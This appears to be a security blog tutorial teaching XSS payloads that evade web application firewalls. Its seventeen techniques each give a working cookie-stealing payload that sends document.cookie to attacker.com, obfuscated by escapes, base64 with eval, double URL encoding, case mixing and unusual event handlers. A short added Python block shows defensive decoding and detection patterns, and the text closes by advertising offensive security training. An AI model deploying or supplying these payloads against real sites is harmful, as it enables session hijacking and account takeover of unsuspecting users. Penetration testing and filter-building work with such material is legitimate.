Mastering XSS: Advanced Techniques to Bypass Web Application Firewalls (WAF)

Bypassing a Web Application Firewall (WAF) for an XSS (Cross-Site Scripting) attack often involves obfuscating or encoding the payload to slip past the filtering mechanisms. Here’s an example of an XSS payload that uses common WAF bypass techniques, including character encoding, manipulation of tags, and creative ways to inject payloads that get past WAFs.

XSS Payload Example:

<svg/onload='fetch(`//attacker.com?cookie=`+document.cookie)'>

However, to make this more likely to bypass WAFs, we’ll introduce several encoding, obfuscation, and technique adjustments:

1. Hexadecimal encoding of characters:

Some WAFs do not decode JavaScript escape sequences, so the function name can be written as \uXXXX escapes (the hex code point of each letter). The browser hands the attribute value to the JavaScript parser, which resolves the escapes back to fetch:

<svg/onload=\u0066\u0065\u0074\u0063\u0068(`//attacker.com?cookie=`+document.cookie)>

2. Broken up tags and attributes:

Varying the case of tag and attribute names, since WAF signatures often match one exact or predictable spelling:

<svG/oNloAd=fetCh(`//attacker.com?cookie=`+dOcument.cookie)>

Notice the mixed case of tags and attributes, which may not be caught by simple WAF filtering.

3. Polyglot XSS (Combining multiple techniques):

A polyglot payload is designed to run regardless of whether it’s inside HTML, a script tag, or an attribute. Here's a simple polyglot example:

"><sVg/onload=fetch(`//attacker.com?cookie=`+document.cookie)>

The leading "> closes the attribute value and tag the input lands in, so this payload works when reflected inside an HTML attribute as well as directly in the page body, and it triggers as soon as the tag is rendered.

4. JavaScript Function Shortcuts and Evasion:

Obfuscating JavaScript code can often confuse simple pattern-matching WAFs. Here’s an example:

<svg onload=window[String.fromCharCode(102,101,116,99,104)]('//attacker.com?cookie='+document.cookie)>

This builds the name fetch from character codes with String.fromCharCode() and looks the function up on window by that name, so the literal string fetch never appears in the payload and simple pattern matching does not see it.

5. URL-encoding or base64 encoding the payload:

Some WAFs don’t properly decode or parse encoded payloads. You can URL-encode the payload, for example:

%3Csvg%20onload%3Dfetch%28%60%2F%2Fattacker.com%3Fcookie%3D%60%2Bdocument.cookie%29%3E

Alternatively, you can Base64 encode the JavaScript and decode it in the browser:

<svg/onload="eval(atob('ZmV0Y2goJy8vYXR0YWNrZXIuY29tP2Nvb2tpZT0nK2RvY3VtZW50LmNvb2tpZSk='))">

These techniques are more advanced and may evade a variety of common filtering mechanisms:

6. HTML Entity Encoding:

Some WAFs might not properly decode HTML entities, allowing you to encode special characters like <, >, " or ' to slip through.

For example, encode special characters using HTML entities:

<svg/onload=&#102;&#101;&#116;&#99;&#104;(`//attacker.com?cookie=`+document.cookie)>

This encodes fetch as &#102;&#101;&#116;&#99;&#104;.

7. Concatenation Using String Methods:

Another bypass technique breaks the payload into smaller pieces and rebuilds the function name at runtime with string concatenation (the + operator, or .concat()):

<svg onload=('f'+'et'+'ch')(`//attacker.com?cookie=`+document.cookie)>

This dynamically concatenates the fetch function to avoid detection.

8. Unicode Character Escaping:

Some WAFs do not properly decode Unicode escape sequences. You can bypass the filter by encoding parts of your payload as Unicode.

For example, you could encode fetch as follows:

<svg onload="\u0066\u0065\u0074\u0063\u0068(`//attacker.com?cookie=`+document.cookie)">

This encodes fetch as Unicode escape sequences, the same idea as technique 1, here inside a quoted attribute value.

9. Using Event Handlers in Alternative HTML Tags:

Most WAFs focus on certain tags like <script>, but there are many HTML elements with event handlers that can be abused, such as <img>, <div>, or even <input>.

For example, instead of using <svg>, you can try:

<input type="text" autofocus onfocus=fetch(`//attacker.com?cookie=`+document.cookie)>

The autofocus attribute ensures that the payload is executed as soon as the page loads.

10. Bypass Using No-Space or Minimal-Space Techniques:

Some WAFs filter based on spaces, assuming the structure of the tag requires spaces between attributes and tags. This can be bypassed by omitting or minimizing spaces.

For example:

<svg/onload=fetch(`//attacker.com?cookie=`+document.cookie)>

Or you could replace spaces with newlines or other whitespace characters that are harder for WAFs to catch:

<svg
onload =
fetch(`//attacker.com?cookie=`+document.cookie)>

11. Using Double Encodings:

You can try using double URL encoding or double escaping to confuse the WAF into missing your payload.

For example, the < character can be double URL-encoded as %253C, and > as %253E, so a basic XSS payload might become:

%253Csvg%2520onload%253Dfetch%2528%2560%252F%252Fattacker.com%253Fcookie%253D%2560%252Bdocument.cookie%2529%253E
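To see why the encodings in techniques 1, 2, 5, 6, 8, 10 and 11 defeat a literal signature, and what a filter has to do instead, here is an added example (not from the original article) that canonicalizes those variants before matching. The decoders, regexes and function names are my own assumptions for illustration, not any WAF product's rules.

```python
import html
import re
from urllib.parse import unquote

# Added example: the canonicalisation a filter needs before pattern matching.
# Each decoder runs repeatedly, so a double-URL-encoded payload resolves on the
# second pass instead of slipping through as an opaque %25 string.

_JS_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")


def _decode_js_escapes(s: str) -> str:
    # \u0066 -> 'f' and \x66 -> 'f', as the JavaScript parser would read them
    return _JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def canonicalize(payload: str, max_rounds: int = 5) -> str:
    cur = payload
    for _ in range(max_rounds):
        nxt = unquote(cur)             # %3C -> '<'; repeated for double encoding
        nxt = html.unescape(nxt)       # &#102; -> 'f'
        nxt = _decode_js_escapes(nxt)  # \u0066 -> 'f'
        if nxt == cur:                 # fixed point reached: nothing left to decode
            break
        cur = nxt
    cur = cur.lower()                                   # svG / oNloAd -> svg / onload
    cur = re.sub(r"\s+", " ", cur)                      # newlines and tabs -> one space
    cur = re.sub(r"\s*=\s*", "=", cur)                  # 'onload =' -> 'onload='
    cur = re.sub(r"<([a-z][a-z0-9]*)/", r"<\1 ", cur)   # <svg/onload -> <svg onload
    return cur.strip()


_EVENT_HANDLER = re.compile(r"<[a-z][a-z0-9]*\b[^>]*\son[a-z]+=")
_JS_URI = re.compile(r"javascript\s*:")


def naive_match(payload: str) -> bool:
    """A literal signature of the kind the variants above are built to evade."""
    return "<svg onload=" in payload


def flags_xss(payload: str) -> bool:
    """Match only after canonicalising, so every encoded variant reduces to one form."""
    c = canonicalize(payload)
    return bool(_EVENT_HANDLER.search(c) or _JS_URI.search(c))
```

Canonicalisation is a detection aid, not a fix: the application still has to context-encode output, and a Content-Security-Policy that forbids inline event handlers and unknown connect-src hosts stops the fetch even when a payload gets through.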

12. Using Mixed Quotes and Encodings:

By mixing single and double quotes and using encodings for critical characters, you can bypass simple filters that assume a predictable structure.

For example:

<svg onload='("f"+"et"+"ch")(`//attacker.com?cookie=`+document.cookie)'>

This wraps the handler in single quotes while the pieces of the fetch name use double quotes, so a filter that expects one quoting style around the function name may not match.

13. Nested Tags (DOM Climbing):

You can sometimes bypass WAFs by nesting tags and placing the malicious payload within an inner tag that the WAF doesn’t expect.

For example:

<svg><g/onload=fetch(`//attacker.com?cookie=`+document.cookie)></g></svg>

This nests the payload inside a <g> tag, which is a child of <svg>.

14. JavaScript Escapes with eval():

Although many WAFs block the use of eval(), using a combination of obfuscation and JavaScript escapes can sometimes slip through:

<svg/onload=eval(String.fromCharCode(102,101,116,99,104)+`('https://attacker.com?cookie='+document.cookie)`);>

This hides the fetch identifier: String.fromCharCode() assembles it at runtime and eval() executes the resulting call.

15. Exploiting Uncommon HTML5 Event Handlers:

HTML5 introduced several new event handlers that are less commonly monitored by WAFs. These handlers include onmouseenter, onmouseleave, oninput, and others.

For example:

<div onmouseenter=fetch(`//attacker.com?cookie=`+document.cookie)>

This payload triggers the XSS when the user moves the mouse pointer over the <div> element.

16. Exploiting URL Protocols:

Some WAFs may not properly sanitize certain URL protocols like javascript:, allowing you to inject malicious JavaScript directly into links.

For example, instead of relying on a tag with onload, you could use:

<a href="javascript:fetch(`//attacker.com?cookie=`+document.cookie)">Click me</a>

If the WAF does not filter javascript: URLs, this can be effective.

17. DOM-based XSS (Client-Side Bypass):

Some WAFs only monitor server-side inputs, so if the application uses client-side JavaScript that directly interacts with the DOM, you can bypass WAFs by injecting malicious scripts that manipulate the DOM dynamically.

Example:

<script>document.write('<img src=x onerror="fetch(`//attacker.com?cookie=`+document.cookie)">');</script>

This manipulates the DOM directly after the page loads, bypassing many server-side filters.

In conclusion, understanding and applying advanced XSS techniques to bypass WAFs is crucial for penetration testers and security researchers who aim to stay ahead of evolving defenses. As attackers continually develop new methods to exploit web vulnerabilities, it's essential to enhance your skills and keep up with the latest in web application security. For those looking to dive deeper into offensive security techniques, Sysbraykr offers tailored cybersecurity services, including Hacking as a Service, staffing, SOC solutions, and private training. Explore more at [Sysbraykr.com](https://sysbraykr.com) and take your skills to the next level with immersive, hands-on training at [Hackerkamp150](https://hackerkamp150.com). Whether you're preparing for red teaming or advanced threat simulations, these resources will equip you with the expertise to tackle real-world challenges.
